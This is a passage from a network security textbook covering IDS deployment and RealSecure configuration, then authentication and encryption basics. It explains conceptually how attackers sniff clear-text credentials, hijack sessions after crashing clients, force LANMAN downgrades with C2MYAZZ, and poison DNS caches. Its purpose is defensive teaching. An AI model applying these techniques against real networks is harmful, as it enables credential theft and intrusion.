One potential deployment is shown in Figure 8.4. In this configuration, both the DMZ and the internal connection of the firewall are being monitored. This allows you to verify all inbound traffic from the Internet. It also allows you to reinforce the existing firewall. Both IDS sensors are running without IP being bound to the public network segment. IP is only running on a network card that connects the sensors back to the console. This allows your IDS sensors to be completely invisible to all systems on the public network segment.

There are a few limitations to this configuration, however. First, you will be unable to monitor attack traffic from the Internet that is targeted at the firewall itself. While your firewall should be capable of logging such activity, you may not have the benefits of raw packet captures, dynamic filter rule manipulation, or any of the other features that an IDS can offer. If your link to the Internet is a T1 or less, and you want to monitor Internet traffic only, you may be better off buying one really good server and running all IDS functions outside the firewall. Since IP will not be needed on this system, it should be safe from attack.

Another limitation of the design in Figure 8.4 is that it does not allow you to monitor any of the unicast traffic generated between internal systems. If your goal is to monitor all network traffic, you may wish to move your internal IDS sensor to its own port on the switch and configure this switch port for monitoring. This would allow you to see all traffic activity inside the firewall.
Figure 8.4: A potential deployment of two IDS sensors

If your goal is to lock down the network as much as possible, you may wish to combine these solutions: place one IDS sensor outside the firewall and another IDS sensor off a monitoring switch port, and have both sensors communicate with the console through a private subnet. This would allow you to monitor all passing traffic within your network while still maintaining control from a central console.

Once you have selected the areas you wish to monitor, you can select the number of IDS sensors required, as well as the appropriate hardware.

Hardware Requirements

ISS suggests the following minimum hardware requirements for the RealSecure Network Sensor:

• Pentium II 300MHz processor
• 128MB of RAM
• 110MB of disk storage
• At least one PCI network card

The disk storage requirements are probably a bit light. If you will be monitoring a high-traffic area or if you think that you may wish to capture a lot of raw data, plan to expand the amount of disk space accordingly.

ISS suggests the following minimum hardware requirements for the RealSecure console:

• Pentium II 300MHz processor
• 128MB of RAM (256MB recommended)
• 100MB of disk storage per sensor
• One PCI network card (an additional NIC can be used to create a secure network for communicating with sensors on remote machines)

Tip
Again, be generous with disk space. It is better to have too much than not enough. The more disk space available, the longer you will be able to retain your logs. This is important if you want to look at any long-term trends. If you will be running the sensor and the console on the same system, consider increasing the processor requirements to a 400MHz Pentium II and the memory requirements to 192MB.

Installing NT

RealSecure should be run on a Windows NT server that has been dedicated to IDS functions. When installing NT Server, observe the following guidelines:

• Install all required network cards before loading NT.
• Create an NTFS C partition of 800MB, which will hold the NT operating system and swap file.
• Create an NTFS D partition of the remaining drive space (200MB minimum) to hold the IDS program files and logs.
• Remove all protocols except TCP/IP.
• In the Control Panel, open the Services dialog box and disable all services except the Event Log service and the Net Logon service.
• Install the 128-bit version of Service Pack 5 (or greater).
• At a minimum, install the hotfixes getadmin-fix, ndis-fix, pent-fix, srvr-fix, and teardrop2-fix. Other hotfixes, such as scsi-fix, can be installed as you require.
• Under the Performance tab in System Properties, change the boost for the foreground application to None.
• If you are running the Server service, go to the Server Properties dialog box and change Optimization to Maximize throughput for network applications.

Once you have followed these guidelines, you are ready to make an emergency recovery disk and install RealSecure.

RealSecure Installation

Installing RealSecure is straightforward. You can download a demo of the various installation files if you contact ISS via e-mail. The demo is simply a copy of the full product that will expire in 15 days.
For more information, visit the ISS Web site at www.iss.net.

The first component to install is the RealSecure Workgroup Manager (Console). The self-extracting executable will start by copying some files to a temporary directory and launching the Setup program. If you do not have at least Service Pack 5 installed (Service Pack 6a is preferred), the Setup program will warn you that it is required and terminate execution.

As shown in Figure 8.5, you are first asked to select which portions of the program you wish to install. You can choose to install the console, restore private keys, or export the public keys of the console. Installing the Network or Server (OS) Sensor is a separate procedure. The latter two options are useful after the IDS software has been installed; they are provided so that you can manage the encryption keys used by the console and the sensors when they are located on different systems. RealSecure uses a public/private key pair for all communications between the console and the sensor. Once you have made your selection, click Next.

Figure 8.5: The Select Install Options screen of the RealSecure installation

You will then be prompted to choose the destination for the RealSecure files. The default is to place them under the Program Files directory on the C drive. It is strongly recommended that you change this path to D so that all RealSecure files are stored on their own partition. This will help to insure that system functionality is not affected if the log files grow large enough to fill the entire drive. Once you have specified a new path, click Next to continue.

Once you have selected a location for your files, if the system detects that you have not installed the high encryption version of a service pack, it will display a warning message to that effect.

After you acknowledge the warning, you will be presented with the Select Cryptographic Setup screen, as shown in Figure 8.6. This screen allows you to select a cryptographic services provider (CSP). The CSP is the component responsible for encrypting and decrypting all traffic between the console and the sensors. The Microsoft Base Cryptographic Provider is installed as part of Service Pack 3 or later, so it is available on all patched systems. If you have a third-party CSP installed on the system, that should appear in this window, as well.

Figure 8.6: The Cryptographic Setup screen

You should use the 128-bit version of Service Pack 6a if you wish to use strong encryption. If you have installed the 40-bit version of any Service Pack, you will only be able to use weak encryption. If you select strong encryption with only the 40-bit version of any Service Pack installed, the installation utility will warn you that only weak encryption can be used. Weak encryption is usually sufficient for use behind a firewall. If you will be communicating on a public network, however, you should seriously consider using strong encryption. As with strong authentication, there is a slight performance degradation when you use strong instead of weak encryption. It is far more secure, however.

At this point, the installation utility will prompt you to name the program group and begin installing files to the system.
Once this process is complete, you will be presented with the dialog box in Figure 8.7, which offers you the opportunity to archive your private keys (securing them with a pass-phrase in the process).

Figure 8.7: RealSecure can archive your private keys.

After this screen, the system begins to copy files. Near the end of the copy process, the system will prompt you if it detects that you lack Microsoft's Data Access Components (MDAC). You can choose to allow the system to install the components (required if you want RealSecure to function properly).

After RealSecure installs the updated MDAC (if required), the installation program prompts you to harden security by checking the permission levels set on the Registry keys and directories used by RealSecure. This is done in order to insure that they can only be accessed by the system administrator or an equivalent account.

Note
You can only set directory permissions on an NT server if you have partitioned your drives to use NTFS.

Now the installation is complete. You will be prompted to reboot the server so that Registry changes can take effect and the IDS sensor service can start. The sensor starts automatically during system initialization, but the console must be launched from the RealSecure program group. Once the system restarts, copy your ISS.KEY file to the RealSecure program directory.

Configuring RealSecure

To launch the RealSecure console, select the RealSecure icon from within the RealSecure program group. This will produce the screen shown in Figure 8.8. The top of your screen is the RealSecure menu. All functions are available via pull-down menu options or from the toolbar. On the bottom of the screen is the Sensor view. This window displays all sensors that are currently being monitored. An unmonitored sensor will still collect data; it simply cannot report this information back to the console. To select a sensor to monitor, click Sensor > Monitor Sensor from the Sensor menu.

Figure 8.8: The RealSecure Console screen

Tip
In order to see all the information screens, you should use a screen resolution of 800 x 600 or higher.

Selecting Monitor Sensor will produce the Add Sensor dialog box. Use this box to select all the sensors you wish to monitor. If you have installed the console and the OS or Network Sensor on the same computer, you should see an entry for the localhost sensor. If the sensor is on a remote computer, you will need to click Add and fill in the IP address of the IDS sensor. Do this for each sensor on your network. Then highlight each sensor you want and click OK to begin monitoring them.

When the sensor appears in the Sensor view, you can right-click a particular sensor entry to produce a Maintenance menu. From this menu, select the Properties option in order to configure the specific characteristics of this sensor. If you have selected a Network Sensor, this will produce the Sensor Properties screen shown in Figure 8.9.

Figure 8.9: The Policies tab of the Network Sensor screen

The Policies tab of the Network Sensor Properties screen allows you to customize the type of security policy your IDS will use. You can select the following options:

Web Watcher applies HTTP-based attack signatures to all Web traffic.
DMZ Engine analyzes traffic inside a DMZ (Demilitarized Zone), searching for attempts to cross the DMZ into the internal network.

Engine Inside Firewall scans traffic on the internal network, looking for anomalies.

For Windows Networks applies only Windows-based signatures to data on a network, optimizing the IDS by screening out all non-Windows data.

Maximum Coverage enables all signatures and all protocol profiles and sends all results to the console. While not a good idea on heavily used networks, this policy is good for evaluation purposes.

Protocol Analyzer is used to view the actual network data. No signatures are activated with this policy—it is used primarily to give administrators an idea of the data flowing across a network.

Session Recorder provides default connection information for NNTP, FTP, and SMTP traffic. These defaults are then modified to create a custom policy.

Attack Detector processes only the most intense data; this policy does no decoding of network data and doesn't record regular connection information.

Note
Remember—the more verification the IDS sensor must perform, the more horsepower it is going to require. The different policies are designed to help you check for only the specific vulnerabilities you need to worry about.

Of course, no policy is ever going to be an exact fit. For this reason, you should consider using one of the policies as a template and customizing it to fit your needs. Instead of editing any of the default policies directly, you should highlight the closest fit and click the Derive New Policy button. This will clone the policy you have highlighted and allow you to give it a name. Once you have completed this task, you can click Customize in order to fine-tune the settings. This will produce the Policy Editor window for your new custom policy. The Policy Editor allows you to alter security and connection events, create user-defined events, and establish filters. As seen in Figure 8.10, the left side of the window holds the tree view of a particular tab, the upper right-hand side holds a detailed list, and the bottom right-hand section displays an explanation of whatever is selected in the left pane.

Figure 8.10: The Security Events tab of the Policy Editor screen allows you to customize your IDS policy settings.

The Security Events tab allows you to configure which attacks your IDS should look for and what type of action should be taken if a particular exploit is detected. The IDS sensor will look for every item that is checked off in the Enabled column. If you know for sure that you are immune to a particular type of exploit, you can conserve resources by not inspecting for it. For example, if none of your hosts is running Finger as a service, there should be no need to check for any of the Finger exploits.

Tip
If you are ever unsure whether you need to worry about a particular exploit, online Help has an excellent description of each exploit listed. If you are still unsure, it is better to err on the side of caution and let the IDS check for the vulnerability.

The Priority column allows you to select the level of urgency you wish to associate with each event. If you refer back to Figure 8.8, you will see that each of these priority levels is displayed in its own window.
This allows you to quickly distinguish between traffic you wish to investigate later and traffic that requires your immediate attention. It also helps to sort these items for later reports. Regardless of the priority you set for an item, the Display box (under the Response column) must be checked in order to have detected events reported in one of the three console windows.

If you click on the Response column, the Response dialog box shown in Figure 8.11 appears. From here you can select how you want the IDS sensor to react when a specific event is detected. This can be as benign as simply logging the event or as reactive as killing the connection, modifying the firewall rules, and sending notification of the event via e-mail or an SNMP trap message. You can even record the raw data of the packets in order to completely document the attack.

Figure 8.11: The Response dialog box

If you click the Connection Events tab of the Policy Editor menu, you will be presented with a screen similar to the one shown in Figure 8.12. Use the Connection Events screen when you require a bit more granularity. For example, let's assume you have a Web server sitting on a DMZ network. While you expect the Web server to receive connections from the outside world, this system should never try to establish any kind of connection with any other system. If this occurs, it is possible that the Web server has been compromised by an attacker who is now trying to probe or attack other systems.

Figure 8.12: The Connection Events tab of the Policy Editor menu

Using the Connection Events settings, you can easily set up three policy rules to monitor all source traffic that originates from your Web server. Three are required because you need to set up one rule for TCP, one rule for UDP, and another for ICMP. For the source address, use the IP address of the Web server. Set Destination Address, Source Port, and Destination Port to Any, because you want to be informed of all traffic originating from this system.

Note
This is a powerful tool, which allows you to monitor more than just events that seem suspicious. The Connection Events settings can also be used to monitor specific services, even if no exploits are detected.

The User-Specified Filters tab of the Policy Editor allows you to configure specific services or systems that the IDS should not monitor. This is useful if you wish to insure that specific types of traffic are not recorded in the IDS logs. For example, you could filter out all HTTP traffic from your desktop system's IP address so that your pointy-haired boss does not find out just how much time you spend surfing the Dilbert Zone. (There may even be a few useful security-related reasons for this feature.)

Finally, the Filters tab lets you ignore any protocol, connection type, or traffic on your network. This can be beneficial, especially if you suspect a hacker is exploiting services beyond the common ones (DNS, FTP, HTTP, and so on). By defining a comprehensive policy and then ignoring the common protocols, you can make unusual traffic patterns stand out.

When you have finished editing your sensor policy, click OK to return to the Policies tab of the Sensor Properties screen.
You will be informed that you have made policy changes and that they need to be applied using the Apply to Sensor button. You can do this now or go on to the General tab to customize the sensor even further.

The General tab (oddly enough) displays general information about the sensor configuration. From here you can see what software version the sensor is running and the system's IP address. You can also view or change the port numbers used to communicate with the console, which NIC the sensor is monitoring, and even the directory where the RealSecure software is located. Typically, you will not need to change any of these settings.

The Alerts tab defines three levels of alerts that the sensor can write to the NT Event Log: Error, Warning, and Informative. Each level can be enabled or disabled and, if enabled, can be configured to notify the console and/or send an SNMP trap to a third-party management system. The Encryption tab shows the current cryptographic provider (the system used to encrypt communication between the sensor and the console) along with all available providers. If you are configuring an OS sensor, the next tab is used to define connection and audit policy settings for the sensor. And finally, the Event Log tab pulls all sensor entries from the NT Event Log and displays them in the window, allowing an administrator to quickly see how the sensor is interacting with the operating system, or if the sensor itself is having a problem.

While responses can be configured for each individual sensor policy, global responses can be used to simplify administration. By selecting the Global Responses option under the View menu, you will be presented with the screen shown in Figure 8.13. There are some important configuration options on this screen that you may wish to modify. The most important is the RSKILL item, which displays the Tag RealSecure Kills check box. When this box is checked, RealSecure adds information to all packets used for session disruption, which helps the person on the other end detect the reason for the dropped connection. While the traffic would have to be inspected with either an analyzer or a tool specifically designed to look for this type of traffic, broadcasting that RealSecure disrupted the connection may be more information than you wish to hand out. If you want your IDS sensor to be truly invisible, you should deselect this option.

Figure 8.13: The Responses tab of the Sensor Properties screen

Also on this tab are text boxes where you can enter the information required to use the associated action item. For example, you must supply a mail gateway and a destination e-mail address if you wish to receive e-mail notification of certain events. Other examples include the Lucent and Check Point firewalls. If you click on the LMF icon on the left pane of the window, the Lucent Firewall options are presented in the right pane, as shown in Figure 8.14. From this screen you can specify the IP address of the firewall that should be notified during certain events and which key should be used to contact it.

Figure 8.14: The Lucent Firewall screen of the Global Responses window

The option below LMF is OPSEC, which refers to FireWall-1 from Check Point. Options on this tab include Notify, which specifies how FireWall-1 should log the recorded event.
The Action item specifies how the firewall responds to an event: whether to simply notify, to inhibit the event, or to inhibit and close the connection. The FireWall Host option specifies which firewall routers are affected—all of them, just the gateway devices, or others as specified by the administrator. The Inhibit Expiration option allows you to specify whether the rule change should be permanent or removed after a specific period of time. And finally, the Initialization Settings and Event Port options specify the IP address and port number of the FireWall-1 Management Server.

Once you have finished making configuration changes, apply them to the system (if the changes were made on the Global Responses page) or to the sensor from its own Responses window. Click OK, and your changes are applied to the system or sensor, and all further traffic inspection is performed using these new policies.

Note
If you have multiple sensors, you should consider using the Global Responses option instead of configuring responses for each one.

Monitoring Events

You can now monitor events from the RealSecure console. The Priority windows on the right-hand side of the screen should begin to display selected events once they are detected. You can even try to trigger one of the events by launching an attack against one of your protected systems. You do not have to try anything destructive; a simple port scan should suffice to insure that the IDS sensor is doing its job.

On the left-hand side of the RealSecure console is the Activity Tree. This window is shown in Figure 8.15 with the Events tab selected. The Activity Tree allows you to quickly sort through all recent activity by source IP address, destination IP address, or even specific event. This can be an extremely powerful tool for determining what traffic is traversing your network. For example, a quick review of Figure 8.15 shows you that someone from an IP address of 24.6.91.205 has attempted to gain access to this NT system (IP address 24.92.184.100) through a NetBIOS session.

Tip
You can access an exploit description of each detected vulnerability by right-clicking it.

Figure 8.15: The Events tab of the Activity Tree window

The amount of detailed information that you can collect with a good IDS is downright scary. For example, let's say you want to further investigate the attempt at system access as illustrated in Figure 8.16. You could click the Source tab in order to get a better look at what these users are doing. By expanding the tree, you can continue down one of the branches until you can see exactly where each host was going.

Figure 8.16: The Event Inspector window

By right-clicking the individual event at the lowest level of detail in the tree, you can choose the Inspect Event option. This creates the Event Inspector window, which provides a high level of detail—the source and destination IP addresses, the protocols, the source and destination ports (including the information type and value), along with the actions taken. In fact, you can resolve the IP address of the system that sent the request into a domain name (see Figure 8.16). This can be useful; by knowing the domain name you can contact the owner of the domain name and eventually trace the activity to a particular system.

While this does not guarantee you'll find the hacker, you can at least eliminate one avenue used to attempt system penetration. In Figure 8.16, you can see that the source of the connection request to the server comes from a computer on the home.com domain (which just happens to be the domain used by @Home, AT&T's cable modem ISP). You could now do a WHOIS query to find out the contact information for the owners of the domain name, and contact them with the details of the attempted access. @Home keeps track of which users are assigned particular host names, and they have a strict usage policy prohibiting unauthorized probing of systems by their clients.
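A WHOIS query is nothing exotic under the hood—per RFC 3912, it is a plain TCP exchange on port 43. Here is a bare-bones sketch; the server name is an assumption for illustration, since registry operators and their servers have changed over the years.

import socket

def whois(domain, server="whois.internic.net"):
    """Send a WHOIS query and return the raw text response."""
    with socket.create_connection((server, 43), timeout=10) as s:
        s.sendall(domain.encode() + b"\r\n")
        response = b""
        while chunk := s.recv(4096):
            response += chunk
    return response.decode(errors="replace")

# print(whois("home.com"))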
The Destination tab yields much of the same detail. The difference is that the tree is sorted by destination IP address or host name. By navigating down the branches, you can see who has accessed each address and what type of traffic was generated.

Reporting

An intrusion detection system would not be complete without the ability to run detailed summary reports for management. Before you can run reports from the RealSecure console, you must upload the data stored in each sensor's database. Do this by selecting File > Synchronize All Logs from the RealSecure console menu.

After all the data has been transferred to the console, you can begin to run reports. Select View > Reports from the RealSecure console menu. The system includes a dozen canned reports. The Top 20 Events report is shown in Figure 8.17.

Figure 8.17: A report on the top 20 events

The Top 20 Events report is designed to give you a 20,000-foot view of what has transpired on your network. If you require further detail, you can select one of the events listed in the left-hand column. This will produce an additional text report that identifies every recorded instance of the event. Of course, all reports can be printed if the RealSecure console has access to a local or network printer.

If none of the reports is to your liking, you can customize new reports to fit your requirements. The console database is even ODBC-compliant, so you can read the data file with ODBC-compliant database programs such as Microsoft Access. This provides even more flexibility in analyzing and reporting the information collected by the RealSecure system.

Summary

In this chapter you have learned about the basics of intrusion detection systems and how they can aid in securing a network environment. You have seen some of the strengths and weaknesses of IDS products in general. We even walked through the installation and configuration of RealSecure, one of the top-selling IDS products.

The next chapter looks at authentication and encryption technology. These have become extremely popular subjects as organizations race to provide connectivity over less-than-secure network channels.

Chapter 9: Authentication and Encryption

Authentication and encryption are two intertwined technologies that help to insure that your data remains secure. Authentication is the process of insuring that both ends of the connection are in fact who they say they are. This applies not only to the entity trying to access a service (such as an end user) but to the entity providing the service, as well (such as a file server or Web site). Encryption helps to insure that the information within a session is not compromised.
"Compromising" could include not only reading the information within a data stream, but altering it, as well.

While authentication and encryption each has its own responsibilities in securing a communication session, maximum protection can only be achieved when the two are combined. For this reason, many security protocols contain both authentication and encryption specifications.

The Need for Improved Security

When IP version 4, the version currently in use on the Internet, was created back in the '70s, network security was not a major concern. While system security was important, little attention was paid to the transport used when exchanging information. When IP was first introduced, it contained no inherent security standards: the specifications for IP do not take into account that you may wish to protect the data that IP is transporting. This will change with IP version 6, but it appears that wide acceptance of this new specification is still many years away.

Clear Text Transmissions

IP currently transmits all data as clear text, which is commonly referred to as transmitting in the clear. This means that the data is not scrambled or rearranged; it is simply transmitted in its raw form. This includes the data itself as well as authentication information. To see how this appears, let's start by looking at Figure 9.1.

Figure 9.1: A packet decode of an authentication session initializing

Figure 9.1 shows a network analyzer's view of a communication session. We have a user who is in the process of retrieving mail with a POP3 mail client. Packets 3–5 are the TCP three-packet handshake used to initialize the connection. Packets 6 and 7 are the POP3 mail server informing the client that it is online and ready. In packet 8, we start finding some very interesting information. If you look toward the bottom of Figure 9.1, you will see the decoded contents of the data field within packet 8. The command USER is used by a POP3 client to pass the logon name to a POP3 server. Any text following the USER command is the name of the person who is attempting to authenticate with the system.

Figure 9.2 shows the POP3 server's response to this logon name. If you look at the decode for packet 9, you can see that the logon name was accepted. This tells us that the logon name captured in Figure 9.1 is in fact legitimate. If you can discover this user's password, you will have enough information to gain access to the system.

Figure 9.2: The POP3 server accepting the logon name

In Figure 9.3, you can see a decode of packet 11. This is the next set of commands sent by the POP3 mail client to the server. The command PASS is used by the client to send the password string. Any text that follows this command is the password for the user attempting to authenticate with the system. As you can see, the password is plainly visible.

Figure 9.3: The POP3 client sending the user's password

In Figure 9.4 we see a decode of packet 12. This is the server's response to the authentication attempt. Notice that the server has accepted the logon name and password combination. We now know that this was a valid authentication session and that we have a legitimate logon name and password combination with which to gain access to the system. In fact, if we decoded further packets, we would be able to view every e-mail message downloaded by this user.

Figure 9.4: The POP3 server accepting the authentication attempt
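The decodes look the way they do because the POP3 commands of RFC 1939 are plain ASCII on the wire—anyone along the path reads the same bytes the server does. A minimal client sketch makes this obvious (the host name and credentials below are placeholders):

import socket

def pop3_login(host, user, password):
    """Log in to a POP3 server; every byte here crosses the wire as-is."""
    with socket.create_connection((host, 110)) as s:
        print(s.recv(1024))                          # +OK server ready
        s.sendall(b"USER " + user.encode() + b"\r\n")
        print(s.recv(1024))                          # +OK
        s.sendall(b"PASS " + password.encode() + b"\r\n")
        print(s.recv(1024))                          # +OK logged in
        s.sendall(b"QUIT\r\n")

# pop3_login("mail.example.com", "cbrenton", "hunter2")

There is no encoding step anywhere in that exchange; the USER and PASS lines the analyzer displayed in Figures 9.1 and 9.3 are literally what the client transmits.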
\n" }, { "page_number": 189, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 189\n \nFigure 9.4: The POP3 server accepting the authentication attempt \nPassively Monitoring Clear Text \nThis POP3 authentication session was captured using a network analyzer. A network analyzer can be either a \ndedicated hardware tool or a software program that runs on an existing system. Network analyzer software can be \npurchased for less than $1,000 for Windows or Mac platforms and is freely available for UNIX. \nNetwork analyzers operate as truly passive devices, meaning that they do not need to transmit any data on to the \nnetwork in order to monitor traffic. While some analyzers do transmit traffic (usually in an effort to locate a \nmanagement station), it is not a requirement. In fact, an analyzer does not even need a valid network address. This \nmeans that a network analyzer can be monitoring your network, and you would have no means of detecting its \npresence without tracing cables and counting hub and switch ports. \nIt is also possible for an attacker to load network analyzer software onto a compromised system. This means that \nan attacker does not need physical access to your facility in order to monitor traffic. She can simply use one of \nyour existing systems to capture the traffic for her. This is why it is so important to perform regular audits on your \nsystems. You clearly do not want a passively monitoring attack to go unnoticed. \nIn order for a network analyzer to capture a communication session, it must be connected somewhere along the \nsession’s path. This could be on the network at some point between the system initializing the session and the \ndestination system. This could also be accomplished by compromising one of the systems at either end of the \nsession. This means that an attacker cannot capture your network traffic over the Internet from a remote location. \nShe must place some form of probe or analyzer within your network. \nNote \nAs you saw in Chapter 4, you can reduce the amount of traffic that an analyzer can \ncapture using bridges, switches, and routers. \nClear Text Protocols \nPOP3 is not the only IP service that communicates via clear text. Nearly every nonproprietary IP service that is not \nspecifically designed to provide authentication and encryption services transmits data as clear text. Here is a \npartial list of clear text services: \nFTP Authentication is clear text. \nTelnet Authentication is clear text. \nSMTP Contents of mail messages are delivered as clear text. \nHTTP Page content and the contents of fields within forms are sent clear text. \nIMAP Authentication is clear text. \nSNMPv1 Authentication is clear text. \nWarning \nThe fact that SNMPv1 uses clear text is particularly nasty. SNMP is used to manage \nand query network devices. This includes switches and routers, as well as servers and \neven firewalls. If the SMTP password is compromised, an attacker can wreak havoc \non your network. SNMPv2 and SNMPv3 include a message algorithm similar to the \none used with Open Shortest Path First (OSPF). This provides a much higher level of \nsecurity and data integrity than the original SNMP specification. Unfortunately, not \nevery networking device supports SNMPv2, let alone SNMPv3. This means that \n" }, { "page_number": 190, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 190\nSNMPv1 is still widely used today. 
Good Authentication Required

The need for good authentication should by now be obvious. A service that passes logon information as clear text is far too easy to monitor. Easily snooped logons can be an even larger problem in environments that do not require frequent password changes, because the attacker then has plenty of time to launch an attack using the compromised account. Also of concern is that most users try to maintain the same logon name and password for all accounts. This means that if I can capture the authentication credentials from an insecure service (such as POP3), I may now have a valid logon name and password for other systems on the network, such as NT and NetWare servers.

Good authentication goes beyond validating the source attempting to access a service during initial logon. You should also validate that the source has not been replaced by an attacking host in the course of the communication session. This type of attack is commonly called session hijacking.

Session Hijacking

Consider the simple network drawing in Figure 9.5. A client is communicating with a server over an insecure network connection. The client has already authenticated with the server and has been granted access. Let's make this a fun example and assume that the client has administrator-level privileges. Woolly Attacker is sitting on a network segment between the client and the server and has been quietly monitoring the session. This has given the attacker time to learn what port and sequence numbers are being used to carry on the conversation.

Figure 9.5: An example of a man-in-the-middle attack

Now let's assume that Woolly Attacker wishes to hijack the administrator's session in order to create a new account with administrator-level privileges. The first thing he does is force the client into a state where it can no longer communicate with the server. This can be done by crashing the client with a Ping of death or a utility such as WinNuke, or by launching an attack such as an ICMP flood. No matter what type of attack Woolly launches, his goal is to ensure that the client cannot respond to traffic sent by the server.

Note: When an ICMP flood is launched against a target, the target spends so much time processing ICMP requests that it does not have enough time to respond to any other communications.

Now that the client is out of the way, Woolly Attacker is free to communicate with the server as if he were the client. He can do this by capturing the server's replies as they head back to the client in order to formulate a proper response. If Woolly has an intimate knowledge of IP, he may even be able to completely ignore the server's replies and transmit port and sequence numbers based on what the expected responses from the server will be. In either case, Woolly Attacker is now communicating with the server, except that the server thinks it is still communicating with the original client.

So good authentication should also verify that the source remains constant and has not been replaced by another system. This can be done by having the two systems exchange a secret during the course of the communication session. A secret can be exchanged with each packet transmitted or at random intervals during the course of the session. Obviously, verifying the source of every packet is far more secure than verifying the source at random intervals. The communication session would be even more secure if you could vary the secret with each packet exchange, as in the sketch below. This would help to ensure that your session would not be vulnerable to session hijacking.
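One way to realize a per-packet, varying secret is to derive a fresh message authentication code for every packet from a shared session secret and a packet counter. The sketch below is a minimal illustration of that idea using Python's standard hmac module; the secret value and payload are invented for the example, and a real protocol would also need replay protection and rekeying logic.

    import hashlib
    import hmac

    def packet_tag(secret: bytes, counter: int, payload: bytes) -> bytes:
        # Derive a fresh key from the shared secret and the packet counter,
        # then authenticate the payload with it. The tag changes on every
        # packet even when the payload does not.
        per_packet_key = hmac.new(secret, counter.to_bytes(8, "big"),
                                  hashlib.sha256).digest()
        return hmac.new(per_packet_key, payload, hashlib.sha256).digest()

    secret = b"session secret exchanged at logon"   # illustrative value

    # Sender tags packet 42; receiver recomputes the tag and compares.
    tag = packet_tag(secret, 42, b"ADD ACCOUNT woolly")
    assert hmac.compare_digest(tag, packet_tag(secret, 42, b"ADD ACCOUNT woolly"))

A hijacker who knocks the real client offline can forge port and sequence numbers, but without the session secret he cannot produce a valid tag, so the server can discard his packets.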
Verifying the Destination

The need to authenticate the source both before and during a communication session is apparent. What may not be apparent is the need to verify the server. Many people take for granted that they will either connect to the intended server or receive some form of host unreachable message. It may not dawn on them that what they assume is the server may actually be an attacker attempting to compromise the network.

C2MYAZZ

The C2MYAZZ utility is an excellent example of a server spoofing attack (a form of man-in-the-middle attack). When Windows 95 was originally introduced, it included two methods of authenticating with a Server Message Block (SMB) system. The default was to authenticate using an encrypted password; this was the preferred method for authenticating with a Windows NT domain. LANMAN authentication was also included, however, for backward compatibility with LANMAN SMB servers. LANMAN authentication requires that the logon name and password be sent in the clear.

When C2MYAZZ is run, it passively waits for a client to authenticate to the NT server. When a logon is detected, C2MYAZZ transmits a single packet back to the client requesting that LANMAN authentication be used instead. The client, trusting that this is the server sending the request, happily obliges and retransmits the credentials in the clear. C2MYAZZ then captures and displays the logon name and password combination. C2MYAZZ causes no disruption in the client's session, as the user will still be able to log on and gain system access.

What makes this utility even more frightening is that it can be run from a single bootable floppy disk. An attacker only needs to place this disk into the floppy drive of a system, power the system on, and come back later to collect the captured credentials.

Note: Microsoft did release a patch for this vulnerability, but you need to install it on every Windows 95 workstation. Newer versions of Windows don't suffer from this vulnerability.

DNS Poisoning

Another exploit that displays the need for authentication is DNS poisoning. DNS poisoning, also known as cache poisoning, is the process of handing out incorrect IP address information for a specific host with the intent to divert traffic from its true destination. Eugene Kashpureff proved this was possible in the summer of 1997 when he diverted requests for InterNIC hosts to his alternate domain name registry site called AlterNIC. He diverted these requests by exploiting a known vulnerability in DNS services.

When a name server receives a reply to a DNS query, it does not validate the source of the reply, nor does it ignore information it never requested. Kashpureff capitalized on these vulnerabilities by hiding bogus DNS information inside valid replies. The name server receiving the reply would cache the valid information, as well as the bogus information. The result was that if a user tried to resolve a host within the InterNIC's domain (for example, rs.internic.net, which is used for whois queries), she would receive an IP address within AlterNIC's domain and be diverted to a system on the AlterNIC network.
While Kashpureff's attack can be considered little more than a prank, it does open the door to some far nastier possibilities. In an age when online banking is the norm, consider the ramifications if someone diverted traffic from a bank's Web site. An attacker, using cache poisoning to divert bank traffic to an alternate server, could configure the phony server to appear identical to the bank's legitimate server.

When a bank client attempts to authenticate to the bank's Web server in order to manage his bank account, the attacker could capture the authentication information and simply present the user with a banner screen stating that the system is currently offline. Unless digital certificates are being used, the client would have no way of knowing he'd been diverted to another site unless he happened to notice the discrepancy in IP addresses.

Note: Digital certificates are described in the "Digital Certificate Servers" section later in this chapter.

It is just as important that you verify the server you are attempting to authenticate with as it is to verify the client's credentials or the integrity of the session. All three points in the communication process are vulnerable to attack.

Encryption 101

Cryptography is a set of techniques used to transform information into an alternate format that can later be reversed. This alternate format is referred to as the ciphertext and is typically created using a crypto algorithm and a crypto key. The crypto algorithm is simply a mathematical formula that is applied to the information you wish to encrypt. The crypto key is an additional variable injected into the algorithm to ensure that the ciphertext is not derived using the same computational operation every time the algorithm processes information.

Let's say the number 42 is extremely important to you and you wish to guard this value from peering eyes. You could create the following crypto algorithm in order to encrypt this data:

    data / crypto key + (2 x crypto key)

This process relies on two important pieces: the crypto algorithm itself and the crypto key. Both are used to create the ciphertext, which would be a new numeric value. In order to reverse the ciphertext and produce an answer of 42, you need to know both the algorithm and the key. (A short code sketch of this toy cipher appears at the end of this section.) There are less secure crypto algorithms known as Caesar ciphers which do not use keys, but these are typically not used because they lack the additional security of a crypto key. You only need to know the algorithm for a Caesar cipher in order to decrypt the ciphertext.

Note: Julius Caesar is credited as being one of the first people to use encryption. It is believed that he used a simple form of encryption in order to send messages to his troops.

Since encryption uses mathematical formulas, there is a symbiotic relationship between

• The algorithm
• The key
• The original data
• The ciphertext

This means that knowing any three of these pieces will allow you to derive the fourth. The exception is when you know the combination of the original data and the ciphertext; if you have multiple examples of both, you may be able to discover the algorithm and the key.
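The toy algorithm above is easy to express in a few lines of code, which also makes plain why both pieces are needed: the decrypt step reverses each operation, and it cannot do so without the key. This is an illustrative sketch only; the key value is arbitrary, and a scheme this simple offers no real protection.

    def encrypt(data: float, key: float) -> float:
        # ciphertext = data / crypto key + (2 x crypto key)
        return data / key + 2 * key

    def decrypt(ciphertext: float, key: float) -> float:
        # Undo the algorithm in reverse order: remove the 2*key term,
        # then multiply the quotient back out.
        return (ciphertext - 2 * key) * key

    key = 7                      # the crypto key (arbitrary example value)
    ciphertext = encrypt(42, key)
    print(ciphertext)            # 20.0 -- reveals nothing obvious about 42
    assert decrypt(ciphertext, key) == 42

Knowing the algorithm alone, an attacker still faces one equation with two unknowns; collecting several data/ciphertext pairs, however, would let him solve for the key, which is exactly the weakness just described.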
Methods of Encryption

The two methods of producing ciphertext are

• The stream cipher
• The block cipher

The two methods are similar except for the amount of data each encrypts on each pass. Most modern encryption schemes use some form of a block cipher.

Stream Cipher

